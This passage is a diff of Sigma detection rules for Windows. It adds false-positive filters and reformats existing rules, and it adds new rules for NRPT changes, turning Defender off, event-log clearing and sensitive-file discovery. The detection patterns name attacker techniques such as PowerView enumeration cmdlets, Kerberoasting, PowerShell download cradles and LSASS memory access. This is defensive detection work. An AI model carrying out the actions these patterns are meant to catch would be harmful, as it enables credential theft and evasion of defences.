+    category: image_load
 detection:
-  selection:
-    Description: 'Python Core'
-  filter:
-    - Image|contains: 
-      - 'Python'  # FPs with python38.dll, python.exe etc.
-    - Image|startswith:
-      - 'C:\Program Files\'
-      - 'C:\Program Files (x86)\'
-  condition: selection and not filter
+    selection:
+        Description: 'Python Core'
+    filter:
+        - Image|contains:
+            - 'Python'  # FPs with python38.dll, python.exe etc.
+        - Image|startswith:
+            - 'C:\Program Files\'
+            - 'C:\Program Files (x86)\'
+            - 'C:\ProgramData\Anaconda3\' # Comment out if you don't use Anaconda in your environment
+    condition: selection and not filter
 fields:
-  - Description
+    - Description
 falsepositives:
-  - Legit Py2Exe Binaries
-level: medium
+    - Legitimate Py2Exe Binaries
+    - Known false positive caused with Python Anaconda
+level: medium
@@ -3,7 +3,7 @@ id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784
 description: Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.
 status: experimental
 date: 2020/10/20
-modified: 2022/08/13
+modified: 2022/09/21
 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
 tags:
    - attack.credential_access
@@ -27,18 +27,26 @@ detection:
    filter_start:
        Image|startswith:
            - 'C:\Windows\System32\'
-            - 'C:\Windows\explorer.exe'
+            - 'C:\Windows\SysWOW64\'
            - 'C:\Program Files\'
            - 'C:\Program Files (x86)\'
    filter_end:
-        Image|endswith: '\opera_autoupdate.exe'
+        Image|endswith:
+            - '\opera_autoupdate.exe'
+            - '\procexp64.exe'
+            - '\procexp.exe'
    filter_full:
-        Image: 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe'
+        Image:
+            - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe'
+            - 'C:\Windows\explorer.exe'
    filter_user:
        Image|startswith: 'C:\Users\'
-        Image|endswith: '\AppData\Roaming\Spotify\Spotify.exe'
-    filter_path:    
-        Image|contains: '\Local\Microsoft\OneDrive\'
+        Image|endswith:
+            - '\AppData\Roaming\Spotify\Spotify.exe'
+            - '\AppData\Local\Microsoft\Teams\current\Teams.exe'
+    filter_contains:
+        Image|startswith: 'C:\Users\'
+        Image|contains: '\AppData\Local\Microsoft\OneDrive\'
    condition: selection and not 1 of filter_*
 falsepositives:
    - Other legitimate processes loading those DLLs in your environment.
@@ -3,7 +3,7 @@ id: ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94
 description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
 status: experimental
 date: 2020/06/24
-modified: 2022/07/18
+modified: 2022/09/18
 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
 tags:
    - attack.execution
@@ -55,6 +55,8 @@ detection:
        Image|startswith: 'C:\Windows\Temp\asgard2-agent\'
    filter_citrix:
        Image|startswith: 'C:\Program Files\Citrix\'
+    filter_ps_ise:
+        Image|endswith: '\powershell_ise.exe'
    svchost:
        Image|endswith: '\svchost.exe'
    commandline_null:
@@ -7,7 +7,7 @@ references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python
    - https://pypi.org/project/scapy/
 date: 2021/12/10
-modified: 2022/08/12
+modified: 2022/09/20
 logsource:
    category: network_connection
    product: windows
@@ -15,7 +15,23 @@ detection:
    selection:
        Initiated: 'true'
        Image|contains: python
-    condition: selection
+    filter_conda:
+        # Related to anaconda updates. Command example: "conda update conda"
+        # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage
+        ParentImage: C:\ProgramData\Anaconda3\Scripts\conda.exe
+        CommandLine|contains|all:
+            - 'C:\ProgramData\Anaconda3\Scripts\conda-script.py'
+            - 'update'
+    filter_conda_jupyter_notebook:
+        # Related to anaconda opening an instance of Jupyter Notebook
+        # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage
+        ParentImage: C:\ProgramData\Anaconda3\python.exe
+        CommandLine|contains: 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py'
+    filter_local_communication:
+        # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances
+        DestinationIp: 127.0.0.1
+        SourceIp: 127.0.0.1
+    condition: selection and not 1 of filter_*
 falsepositives:
    - Legitimate python script
 level: medium
@@ -9,7 +9,7 @@ references:
    - https://www.ietf.org/rfc/rfc2821.txt
 author: frack113
 date: 2022/01/07
-modified: 2022/02/16
+modified: 2022/09/21
 logsource:
    category: network_connection
    product: windows
@@ -27,7 +27,10 @@ detection:
            - \outlook.exe
    filter_mailserver:
        Image|startswith: 'C:\Program Files\Microsoft\Exchange Server\'
-    condition: selection and not 1 of filter*
+    filter_outlook:
+        Image|startswith: 'C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_'
+        Image|endswith: '\HxTsr.exe'
+    condition: selection and not 1 of filter_*
 falsepositives:
    - Other SMTP tools
 level: medium
@@ -4,36 +4,36 @@ status: test
 description: Detects programs with network connections running in suspicious files system locations
 author: Florian Roth, Tim Shelton
 references:
-  - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
+    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
 date: 2017/03/19
 modified: 2022/05/26
 logsource:
-  category: network_connection
-  product: windows
-  definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events'
+    category: network_connection
+    product: windows
+    definition: 'Use the following config to generate the necessary Event ID 3 Network Connection events'
 detection:
-  selection:
-    - Image|contains:
+    selection:
+        - Image|contains:
            # - '\ProgramData\'  # too many false positives, e.g. with Webex for Windows
-      - '\Users\All Users\'
-      - '\Users\Default\'
-      - '\Users\Public\'
-      - '\Users\Contacts\'
-      - '\Users\Searches\'
-      - '\config\systemprofile\'
-      - '\Windows\Fonts\'
-      - '\Windows\IME\'
-      - '\Windows\addins\'
-    - Image|endswith:
-      - '\$Recycle.bin'
-    - Image|startswith:
-      - 'C:\Perflogs\'
-  false_positive1:
-    Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location
-  condition: selection and not 1 of false_positive*
+            - '\Users\All Users\'
+            - '\Users\Default\'
+            - '\Users\Public\'
+            - '\Users\Contacts\'
+            - '\Users\Searches\'
+            - '\config\systemprofile\'
+            - '\Windows\Fonts\'
+            - '\Windows\IME\'
+            - '\Windows\addins\'
+        - Image|endswith:
+            - '\$Recycle.bin'
+        - Image|startswith:
+            - 'C:\Perflogs\'
+    false_positive1:
+        Image|startswith: 'C:\Users\Public\IBM\ClientSolutions\Start_Programs\' # IBM Client Solutions Default Location
+    condition: selection and not 1 of false_positive*
 falsepositives:
-  - Unknown
+    - Unknown
 level: high
 tags:
-  - attack.command_and_control
-  - attack.t1105
+    - attack.command_and_control
+    - attack.t1105
@@ -56,5 +56,5 @@ detection:
            - '\MsFteWds'
    condition: 1 of selection_malleable_profile* and not filter
 falsepositives:
-    - Chrome instances using the exactly same name pipe named mojo.something
+    - Chrome instances using the exact same pipe name "mojo.something"
 level: high
@@ -3,10 +3,10 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc
 description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
 status: test
 date: 2019/08/11
-modified: 2022/04/21
+modified: 2022/09/20
 author: Roberto Rodriguez @Cyb3rWard0g
 references:
-    - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html
+    - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html
 tags:
    - attack.execution
    - attack.t1059.001
@@ -25,9 +25,13 @@ detection:
        ContextInfo|contains: 'C:\Windows\system32\dsac.exe'
    filter_winrm:
        ContextInfo|contains: 'C:\Windows\system32\wsmprovhost.exe -Embedding'
+    filter_help_update:
+        Payload|contains:
+            - 'Update-Help'
+            - 'Failed to update Help for the module'
    condition: selection and not 1 of filter*
 falsepositives:
    - Programs using PowerShell directly without invocation of a dedicated interpreter
    - MSP Detection Searcher
    - Citrix ConfigSync.ps1
-level: medium
+level: medium
@@ -0,0 +1,26 @@
+title: Powershell Add Name Resolution Policy Table Rule
+id: 4368354e-1797-463c-bc39-a309effbe8d7
+status: experimental
+description: Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query.
+references:
+    - https://twitter.com/NathanMcNulty/status/1569497348841287681
+    - https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps
+author: Borna Talebi
+date: 2021/09/14
+logsource:
+    product: windows
+    category: ps_script
+    definition: Script Block Logging must be enabled
+detection:
+    selection:
+        ScriptBlockText|contains|all:
+            - 'Add-DnsClientNrptRule'
+            - '-Namesp'
+            - '-NameSe'
+    condition: selection
+tags:
+    - attack.impact
+    - attack.t1565
+falsepositives:
+    - Unknown
+level: high
@@ -0,0 +1,36 @@
+title: Disable-WindowsOptionalFeature Command PowerShell
+id: 99c4658d-2c5e-4d87-828d-7c066ca537c3
+status: experimental
+author: frack113
+date: 2022/09/10
+description: |
+  Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.
+  Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
+references:
+    - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md
+    - https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
+tags:
+    - attack.defense_evasion
+    - attack.t1562.001
+logsource:
+    product: windows
+    category: ps_script
+    definition: Script block logging must be enabled
+detection:
+    selection_cmd:
+        ScriptBlockText|contains|all:
+            - 'Disable-WindowsOptionalFeature'
+            - '-Online'
+            - '-FeatureName'
+    selection_feature:
+        # Add any important windows features
+        ScriptBlockText|contains:
+            - 'Windows-Defender-Gui'
+            - 'Windows-Defender-Features'
+            - 'Windows-Defender'
+            - 'Windows-Defender-ApplicationGuard'
+            #- 'Containers-DisposableClientVM' # Windows Sandbox
+    condition: all of selection*
+falsepositives:
+    - Unknown
+level: high
@@ -0,0 +1,33 @@
+title: Enable-WindowsOptionalFeature Command PowerShell
+id: 55c925c1-7195-426b-a136-a9396800e29b
+status: experimental
+author: frack113
+date: 2022/09/10
+description: |
+  Detect built in PowerShell cmdlet Enable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.
+  Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
+references:
+    - https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps
+tags:
+    - attack.defense_evasion
+logsource:
+    product: windows
+    category: ps_script
+    definition: Script block logging must be enabled
+detection:
+    selection_cmd:
+        ScriptBlockText|contains|all:
+            - 'Enable-WindowsOptionalFeature'
+            - '-Online'
+            - '-FeatureName'
+    selection_feature:
+        # Add any unsecure windows features
+        ScriptBlockText|contains:
+            - 'TelnetServer'
+            - 'Internet-Explorer-Optional-amd64'
+            - 'TFTP'
+            - 'SMB1Protocol'
+    condition: all of selection*
+falsepositives:
+    - Unknown
+level: medium
@@ -18,131 +18,131 @@ logsource:
    category: ps_script
    definition: Script Block Logging must be enabled
 detection:
-  selection:
-      ScriptBlockText|contains:
-        - Export-PowerViewCSV
-        - Get-IPAddress
-        - Resolve-IPAddress
-        - Convert-NameToSid
-        - ConvertTo-SID
-        - Convert-ADName
-        - ConvertFrom-UACValue
-        - Add-RemoteConnection
-        - Remove-RemoteConnection
-        - Invoke-UserImpersonation
-        - Invoke-RevertToSelf
-        - Request-SPNTicket
-        - Get-DomainSPNTicket
-        - Invoke-Kerberoast
-        - Get-PathAcl
-        - Get-DNSZone
-        - Get-DomainDNSZone
-        - Get-DNSRecord
-        - Get-DomainDNSRecord
-        - Get-NetDomain
-        - Get-Domain
-        - Get-NetDomainController
-        - Get-DomainController
-        - Get-NetForest
-        - Get-Forest
-        - Get-NetForestDomain
-        - Get-ForestDomain
-        - Get-NetForestCatalog
-        - Get-ForestGlobalCatalog
-        - Find-DomainObjectPropertyOutlier
-        - Get-NetUser
-        - Get-DomainUser
-        - New-DomainUser
-        - Set-DomainUserPassword
-        - Get-UserEvent
-        - Get-DomainUserEvent
-        - Get-NetComputer
-        - Get-DomainComputer
-        - Get-ADObject
-        - Get-DomainObject
-        - Set-ADObject
-        - Set-DomainObject
-        - Get-ObjectAcl
-        - Get-DomainObjectAcl
-        - Add-ObjectAcl
-        - Add-DomainObjectAcl
-        - Invoke-ACLScanner
-        - Find-InterestingDomainAcl
-        - Get-NetOU
-        - Get-DomainOU
-        - Get-NetSite
-        - Get-DomainSite
-        - Get-NetSubnet
-        - Get-DomainSubnet
-        - Get-DomainSID
-        - Get-NetGroup
-        - Get-DomainGroup
-        - New-DomainGroup
-        - Find-ManagedSecurityGroups
-        - Get-DomainManagedSecurityGroup
-        - Get-NetGroupMember
-        - Get-DomainGroupMember
-        - Add-DomainGroupMember
-        - Get-NetFileServer
-        - Get-DomainFileServer
-        - Get-DFSshare
-        - Get-DomainDFSShare
-        - Get-NetGPO
-        - Get-DomainGPO
-        - Get-NetGPOGroup
-        - Get-DomainGPOLocalGroup
-        - Find-GPOLocation
-        - Get-DomainGPOUserLocalGroupMapping
-        - Find-GPOComputerAdmin
-        - Get-DomainGPOComputerLocalGroupMapping
-        - Get-DomainPolicy
-        - Get-NetLocalGroup
-        - Get-NetLocalGroupMember
-        - Get-NetShare
-        - Get-NetLoggedon
-        - Get-NetSession
-        - Get-LoggedOnLocal
-        - Get-RegLoggedOn
-        - Get-NetRDPSession
-        - Invoke-CheckLocalAdminAccess
-        - Test-AdminAccess
-        - Get-SiteName
-        - Get-NetComputerSiteName
-        - Get-Proxy
-        - Get-WMIRegProxy
-        - Get-LastLoggedOn
-        - Get-WMIRegLastLoggedOn
-        - Get-CachedRDPConnection
-        - Get-WMIRegCachedRDPConnection
-        - Get-RegistryMountedDrive
-        - Get-WMIRegMountedDrive
-        - Get-NetProcess
-        - Get-WMIProcess
-        - Find-InterestingFile
-        - Invoke-UserHunter
-        - Find-DomainUserLocation
-        - Invoke-ProcessHunter
-        - Find-DomainProcess
-        - Invoke-EventHunter
-        - Find-DomainUserEvent
-        - Invoke-ShareFinder
-        - Find-DomainShare
-        - Invoke-FileFinder
-        - Find-InterestingDomainShareFile
-        - Find-LocalAdminAccess
-        - Invoke-EnumerateLocalAdmin
-        - Find-DomainLocalGroupMember
-        - Get-NetDomainTrust
-        - Get-DomainTrust
-        - Get-NetForestTrust
-        - Get-ForestTrust
-        - Find-ForeignUser
-        - Get-DomainForeignUser
-        - Find-ForeignGroup
-        - Get-DomainForeignGroupMember
-        - Invoke-MapDomainTrust
-        - Get-DomainTrustMapping
-  condition: selection
+    selection:
+        ScriptBlockText|contains:
+            - Export-PowerViewCSV
+            - Get-IPAddress
+            - Resolve-IPAddress
+            - Convert-NameToSid
+            - ConvertTo-SID
+            - Convert-ADName
+            - ConvertFrom-UACValue
+            - Add-RemoteConnection
+            - Remove-RemoteConnection
+            - Invoke-UserImpersonation
+            - Invoke-RevertToSelf
+            - Request-SPNTicket
+            - Get-DomainSPNTicket
+            - Invoke-Kerberoast
+            - Get-PathAcl
+            - Get-DNSZone
+            - Get-DomainDNSZone
+            - Get-DNSRecord
+            - Get-DomainDNSRecord
+            - Get-NetDomain
+            - Get-Domain
+            - Get-NetDomainController
+            - Get-DomainController
+            - Get-NetForest
+            - Get-Forest
+            - Get-NetForestDomain
+            - Get-ForestDomain
+            - Get-NetForestCatalog
+            - Get-ForestGlobalCatalog
+            - Find-DomainObjectPropertyOutlier
+            - Get-NetUser
+            - Get-DomainUser
+            - New-DomainUser
+            - Set-DomainUserPassword
+            - Get-UserEvent
+            - Get-DomainUserEvent
+            - Get-NetComputer
+            - Get-DomainComputer
+            - Get-ADObject
+            - Get-DomainObject
+            - Set-ADObject
+            - Set-DomainObject
+            - Get-ObjectAcl
+            - Get-DomainObjectAcl
+            - Add-ObjectAcl
+            - Add-DomainObjectAcl
+            - Invoke-ACLScanner
+            - Find-InterestingDomainAcl
+            - Get-NetOU
+            - Get-DomainOU
+            - Get-NetSite
+            - Get-DomainSite
+            - Get-NetSubnet
+            - Get-DomainSubnet
+            - Get-DomainSID
+            - Get-NetGroup
+            - Get-DomainGroup
+            - New-DomainGroup
+            - Find-ManagedSecurityGroups
+            - Get-DomainManagedSecurityGroup
+            - Get-NetGroupMember
+            - Get-DomainGroupMember
+            - Add-DomainGroupMember
+            - Get-NetFileServer
+            - Get-DomainFileServer
+            - Get-DFSshare
+            - Get-DomainDFSShare
+            - Get-NetGPO
+            - Get-DomainGPO
+            - Get-NetGPOGroup
+            - Get-DomainGPOLocalGroup
+            - Find-GPOLocation
+            - Get-DomainGPOUserLocalGroupMapping
+            - Find-GPOComputerAdmin
+            - Get-DomainGPOComputerLocalGroupMapping
+            - Get-DomainPolicy
+            - Get-NetLocalGroup
+            - Get-NetLocalGroupMember
+            - Get-NetShare
+            - Get-NetLoggedon
+            - Get-NetSession
+            - Get-LoggedOnLocal
+            - Get-RegLoggedOn
+            - Get-NetRDPSession
+            - Invoke-CheckLocalAdminAccess
+            - Test-AdminAccess
+            - Get-SiteName
+            - Get-NetComputerSiteName
+            - Get-Proxy
+            - Get-WMIRegProxy
+            - Get-LastLoggedOn
+            - Get-WMIRegLastLoggedOn
+            - Get-CachedRDPConnection
+            - Get-WMIRegCachedRDPConnection
+            - Get-RegistryMountedDrive
+            - Get-WMIRegMountedDrive
+            - Get-NetProcess
+            - Get-WMIProcess
+            - Find-InterestingFile
+            - Invoke-UserHunter
+            - Find-DomainUserLocation
+            - Invoke-ProcessHunter
+            - Find-DomainProcess
+            - Invoke-EventHunter
+            - Find-DomainUserEvent
+            - Invoke-ShareFinder
+            - Find-DomainShare
+            - Invoke-FileFinder
+            - Find-InterestingDomainShareFile
+            - Find-LocalAdminAccess
+            - Invoke-EnumerateLocalAdmin
+            - Find-DomainLocalGroupMember
+            - Get-NetDomainTrust
+            - Get-DomainTrust
+            - Get-NetForestTrust
+            - Get-ForestTrust
+            - Find-ForeignUser
+            - Get-DomainForeignUser
+            - Find-ForeignGroup
+            - Get-DomainForeignGroupMember
+            - Invoke-MapDomainTrust
+            - Get-DomainTrustMapping
+    condition: selection
 falsepositives:
    - Should not be any as administrators do not use this tool
 level: high
@@ -9,15 +9,17 @@ references:
    - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2
    - https://www.ietf.org/rfc/rfc2821.txt
 author: frack113
-date: 2022/01/07
+date: 2022/09/26
 logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
 detection:
-    selection_cmdlet:
-        ScriptBlockText|contains: Send-MailMessage
-    condition: selection_cmdlet
+    selection:
+        ScriptBlockText|contains: 'Send-MailMessage'
+    filter:
+        ScriptBlockText|contains: 'CmdletsToExport'
+    condition: selection and not filter
 falsepositives:
    - Legitimate script
 level: medium
@@ -0,0 +1,35 @@
+title: Powershell Sensitive File Discovery
+id: 7d416556-6502-45b2-9bad-9d2f05f38997
+related:
+    - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9
+      type: derived
+description: Detect adversaries enumerate sensitive files
+references:
+    - https://twitter.com/malmoeb/status/1570814999370801158
+status: experimental
+author: frack113
+date: 2022/09/16
+logsource:
+    product: windows
+    category: ps_script
+    definition: Script block logging must be enabled
+detection:
+    selection_action:
+        ScriptBlockText|contains:
+            - ls
+            - get-childitem
+            - gci
+    selection_recurse:
+        ScriptBlockText|contains: '-recurse'
+    selection_file:
+        ScriptBlockText|contains:
+            - '.pass'
+            - '.kdbx'
+            - '.kdb'
+    condition: all of selection_*
+falsepositives:
+    - Unknown
+level: medium
+tags:
+    - attack.discovery
+    - attack.t1083
@@ -0,0 +1,31 @@
+title: Suspicious Eventlog Clear
+id: 0f017df3-8f5a-414f-ad6b-24aff1128278
+related:
+    - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5
+      type: derived
+description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the windows event logs
+references:
+    - https://twitter.com/oroneequalsone/status/1568432028361830402
+    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md
+    - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html
+status: experimental
+author: Nasreddine Bencherchali
+date: 2022/09/12
+logsource:
+    product: windows
+    category: ps_script
+    definition: Script block logging must be enabled
+detection:
+    selection:
+        ScriptBlockText|contains:
+            - 'Clear-EventLog '
+            - 'Remove-EventLog '
+            - 'Limit-EventLog '
+            - 'Clear-WinEvent '
+    condition: selection
+falsepositives:
+    - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate
+level: medium
+tags:
+    - attack.defense_evasion
+    - attack.t1070.001
@@ -10,7 +10,7 @@ references:
    - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
 author: James Pemberton / @4A616D6573
 date: 2019/10/24
-modified: 2021/10/16
+modified: 2022/09/26
 tags:
    - attack.execution
    - attack.t1059.001
@@ -27,7 +27,9 @@ detection:
            - 'curl '
            - 'Net.WebClient'
            - 'Start-BitsTransfer'
-    condition: selection
+    filter:
+        Path|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
+    condition: selection and not filter
 falsepositives:
    - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.
 level: medium
@@ -5,7 +5,7 @@ description: Detects process access LSASS memory which is typical for credential
 author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov,
    oscd.community (update)
 date: 2017/02/16
-modified: 2022/07/05
+modified: 2022/09/13
 references:
    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow
    - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
@@ -119,6 +119,9 @@ detection:
    filter_webex:
        SourceImage|endswith: '\AppData\Local\WebEx\WebexHost.exe'
        GrantedAccess: '0x401'
+    filter_malwarebytes:
+        SourceImage: 'C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\ctlrupdate\mbupdatr.exe'
+        GrantedAccess: '0x1410'
    # Old - too broad filter
        # SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts
        #     - '\wmiprvse.exe'
@@ -6,7 +6,7 @@ references:
 status: experimental
 author: Christian Burkard, Tim Shelton
 date: 2021/07/28
-modified: 2022/08/09
+modified: 2022/09/20
 logsource:
    category: process_access
    product: windows
@@ -32,6 +32,26 @@ detection:
    falsepositive6:
        TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe'
        SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe'
+    falsepositive7: # VsCode
+        TargetImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe'
+        SourceImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe'
+    falsepositive8: # Google Chrome
+        TargetImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe'
+        SourceImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe'
+    falsepositive9: # Google Chrome Update
+        TargetImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe'
+        SourceImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe'
+    falsepositive10: # MS Teams
+        TargetImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe'
+        SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe'
+    falsepositives11:
+        TargetImage: 'C:\Windows\System32\backgroundTaskHost.exe'
+        SourceImage: 'C:\Windows\System32\backgroundTaskHost.exe'
+    falsepositives12:
+        TargetImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe'
+        SourceImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe'
+    falsepositive_kerneltrace_edge:  # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider
+        Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls'
    condition: selection and not 1 of falsepositive*
 falsepositives:
    - Unknown
@@ -7,7 +7,7 @@ status: experimental
 description: Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)
 author: Florian Roth
 date: 2022/03/13
-modified: 2022/08/13
+modified: 2022/09/20
 references:
    - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow
@@ -38,8 +38,8 @@ detection:
            - 'C:\Windows\System32\lsass.exe'
            - 'C:\WINDOWS\System32\perfmon.exe'
            - 'C:\WINDOWS\system32\wbem\wmiprvse.exe'
-            - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe'       
-            - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe'            
+            - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe'
+            - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe'
    # Windows Defender
    filter2:
        SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\'
@@ -92,6 +92,10 @@ detection:
            - '\MBAMInstallerService.exe'
            - '\WebEx\WebexHost.exe '
            - '\Programs\Microsoft VS Code\Code.exe'
+            - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe'
+    filter_xampp:
+        SourceImage|endswith: '\xampp-control.exe'
+        GrantedAccess: '0x410'
    condition: selection and not 1 of filter*
 fields:
    - User
@@ -4,7 +4,7 @@ status: experimental
 description: Detects process access to LSASS memory with suspicious access flags and from a suspicious folder
 author: Florian Roth
 date: 2021/11/27
-modified: 2022/07/07
+modified: 2022/09/20
 references:
    - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
    - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow
@@ -65,6 +65,7 @@ detection:
            - '\MBAMInstallerService.exe'
            - '\WebexMTA.exe'
            - '\WebEx\WebexHost.exe'
+            - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe'
        GrantedAccess: '0x410'
    filter2:
        SourceImage|startswith: 'C:\Windows\Temp\'
@@ -84,9 +85,9 @@ detection:
            - '\vs_bootstrapper_'
        GrantedAccess: '0x1410'
    filter_chrome:
-            SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\'
-            SourceImage|endswith: '.tmp\GoogleUpdate.exe'
-            GrantedAccess: '0x410'
+        SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\'
+        SourceImage|endswith: '.tmp\GoogleUpdate.exe'
+        GrantedAccess: '0x410'
    condition: selection and not 1 of filter*
 fields:
    - User
@@ -4,6 +4,7 @@ status: experimental
 description: Detects shellcode injection by Metasploit's migrate and Empire's psinject
 author: Bhabesh Raj
 date: 2022/03/11
+modified: 2022/09/21
 tags:
    - attack.defense_evasion
    - attack.privilege_escalation
@@ -13,11 +14,38 @@ logsource:
    product: windows
 detection:
    selection:
-        GrantedAccess: 
+        GrantedAccess:
            - '0x147a'
            - '0x1f3fff'
        CallTrace|contains: 'UNKNOWN'
-    condition: selection
+    filter_dell_folders:
+        # If dell software is installed we get matches like these
+        # Example 1:
+        #   SourceImage: C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe
+        #   TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe
+        #   GrantedAccess: 0x1F3FFF
+        # Example 2:
+        #   SourceImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe
+        #   TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe
+        #   GrantedAccess: 0x1F3FFF
+        # Example 3:
+        #   SourceImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe
+        #   TargetImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe
+        #   GrantedAccess: 0x1F3FFF
+        SourceImage|startswith:
+            - 'C:\Program Files\Dell\'
+            - 'C:\Program Files (x86)\Dell\'
+        TargetImage|startswith:
+            - 'C:\Program Files\Dell\'
+            - 'C:\Program Files (x86)\Dell\'
+        GrantedAccess: 0x1F3FFF
+        CallTrace|startswith: 'C:\Windows\System32\ntdll.dll'
+    filter_dell_specifc:
+        SourceImage: C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe
+        TargetImage: C:\Windows\Explorer.EXE
+        GrantedAccess: 0x1F3FFF
+        CallTrace|startswith: 'C:\Windows\System32\ntdll.dll'
+    condition: selection and not 1 of filter_*
 falsepositives:
    - Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well
-level: high
+level: high
@@ -13,6 +13,7 @@ tags:
    - attack.s0190
    - attack.t1036.003
 date: 2022/06/28
+modified: 2022/09/13
 author: Florian Roth
 logsource:
    category: process_creation
@@ -28,6 +29,7 @@ detection:
        CommandLine|contains:
